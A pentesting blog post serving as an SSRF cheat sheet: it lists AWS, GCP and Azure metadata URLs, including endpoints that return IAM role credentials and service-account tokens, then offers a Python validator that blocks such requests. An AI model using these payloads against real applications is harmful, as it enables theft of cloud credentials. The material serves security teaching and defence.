Learn Pentesting like a Pro!

SSRF cheat sheet for AWS, GCP and Azure

pentesting.academy

Feb 6
In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or modify a URL which the code running on the server will read or submit data to, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like HTTP-enabled databases, or perform POST requests towards internal services which are not intended to be exposed.

Source: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery

If a cloud app is vulnerable to SSRF, you can read valuable infrastructure information. Below are the most useful URLs, sorted by provider:

AWS

  • http://169.254.169.254/latest/user-data

  • http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

  • http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]

  • http://169.254.169.254/latest/meta-data/ami-id

  • http://169.254.169.254/latest/meta-data/reservation-id

  • http://169.254.169.254/latest/meta-data/hostname

  • http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

  • http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key

  • http://169.254.169.254/latest/meta-data/

  • http://169.254.169.254/latest/meta-data/public-keys/

GCP

NOTE: Requires the header “Metadata-Flavor: Google” or “X-Google-Metadata-Request: True”

  • http://169.254.169.254/computeMetadata/v1/

  • http://metadata.google.internal/computeMetadata/v1/

  • http://metadata/computeMetadata/v1/

  • http://metadata.google.internal/computeMetadata/v1/instance/id

  • http://metadata.google.internal/computeMetadata/v1/instance/region

  • http://metadata.google.internal/computeMetadata/v1/instance/zone

  • http://metadata.google.internal/computeMetadata/v1/project/project-id

  • http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

  • http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/

  • http://metadata.google.internal/computeMetadata/v1beta1/

Azure

  • http://169.254.169.254/metadata/v1/maintenance

Blind SSRF reference: https://github.com/assetnote/blind-ssrf-chains
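On the defending side, every endpoint listed above is reached either through the link-local address 169.254.169.254 or through a metadata hostname, so an outbound-URL check can refuse both before the server fetches anything. The following is an added example, not part of the original post; `check_outbound_url`, `system_resolver` and the sample hostnames are hypothetical names chosen for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Metadata hostnames taken from the GCP list above.
METADATA_HOSTS = {"metadata.google.internal", "metadata"}

def system_resolver(host):
    """Resolve a hostname to the set of addresses the OS returns."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def check_outbound_url(url, resolver=system_resolver):
    """Return (allowed, reason) for a URL the server is about to fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        return False, "missing host"
    if host in METADATA_HOSTS:
        return False, "metadata hostname"
    try:
        addrs = {ipaddress.ip_address(host)}      # host is an IP literal
    except ValueError:
        try:                                       # host is a name: resolve it
            addrs = {ipaddress.ip_address(a) for a in resolver(host)}
        except (OSError, ValueError):
            return False, "unresolvable host"
    if not addrs:
        return False, "unresolvable host"
    # 169.254.169.254 sits in 169.254.0.0/16, the IPv4 link-local range.
    if any(a.is_link_local for a in addrs):
        return False, "link-local address"
    return True, "ok"

if __name__ == "__main__":
    # Constructed DNS answers so the demo runs offline.
    fake_dns = {"api.example.com": {"93.184.216.34"},
                "img.example.net": {"169.254.169.254"}}
    lookup = lambda h: fake_dns[h]
    for u in ["http://169.254.169.254/latest/meta-data/",
              "http://metadata.google.internal/computeMetadata/v1/",
              "http://img.example.net/logo.png",
              "https://api.example.com/v1/items"]:
        print(u, check_outbound_url(u, lookup))
```

The check only holds if the HTTP client then connects to the address that was validated and re-runs the check on every redirect; a second, independent DNS lookup at fetch time can return a different answer.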

© 2023 pentesting.academy